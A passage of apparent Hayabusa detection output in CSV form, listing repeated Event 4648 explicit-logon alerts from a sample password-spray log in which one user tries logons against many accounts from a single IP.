DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:44.801 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:45.880 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:46.969 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:48.042 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:49.108 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:50.156 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:51.239 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:52.302 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:53.366 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:54.441 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:55.503 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:56.579 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:57.650 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:58.722 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:59.800 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:00.872 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:01.934 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:02.995 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:04.075 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:05.156 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:06.238 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:07.308 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:08.370 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:09.433 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:10.523 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:11.590 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:12.649 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:13.722 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:14.787 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:15.846 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:16.940 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:18.019 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:19.076 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:20.162 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:21.257 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:22.327 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:23.410 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:24.477 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:25.557 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:26.628 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:27.690 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:28.763 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:29.837 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:30.921 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:31.996 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:33.058 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:34.138 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:35.199 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:36.266 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:37.375 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:38.439 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:39.499 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:40.560 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:41.637 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:42.734 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:43.795 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:44.875 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:45.951 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:47.017 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:48.096 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:49.176 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:50.264 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:51.340 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:52.405 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:53.466 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:54.572 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:55.671 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:56.741 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:57.817 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:58.894 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:59.965 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:01.026 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:02.115 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:03.191 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:04.272 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:05.348 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:06.426 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:07.478 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:08.564 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:09.668 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:10.717 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:11.809 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source 